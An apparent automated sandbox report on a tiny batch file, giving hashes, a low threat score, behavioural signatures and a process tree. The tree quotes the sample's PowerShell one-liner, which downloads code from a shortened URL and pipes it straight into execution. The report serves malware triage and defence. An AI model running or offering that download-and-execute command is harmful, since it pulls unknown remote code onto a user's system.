Analysis
-
max time kernel
16s -
max time network
16s -
platform
windows7_x64 -
resource
win7-20240708-en -
resource tags
arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system -
submitted
29/09/2024, 15:45
Static task
static1
Behavioral task
behavioral1
Sample
b.bat
Resource
win7-20240708-en
3 signatures
150 seconds
Behavioral task
behavioral2
Sample
b.bat
Resource
win10v2004-20240802-en
29 signatures
150 seconds
General
-
Target
b.bat
-
Size
40B
-
MD5
242be57538ee9e59d36d9dffbb935286
-
SHA1
e0dee09964cfbfaaad8830affb18a2b332c7f04c
-
SHA256
c04f0537d8d04fe4bf68fffa6d51b8561fe27b8c8a32e73cf12a1ca1d77819bf
-
SHA512
4634d51f554aa8cad5806376a0dfdf67bafbeeda6393ec156f062bf40eff46503ae94e9b8c7286a792acbb5c2f88823756eb3a87cc1a0cf9453d999ce4ce6294
Score
1/10
Malware Config
Signatures
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2816 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2816 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 2292 wrote to memory of 2816 2292 cmd.exe 31 PID 2292 wrote to memory of 2816 2292 cmd.exe 31 PID 2292 wrote to memory of 2816 2292 cmd.exe 31
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\b.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:2292 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell "irm shorturl.at/PcgQ7 | iex"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2816
-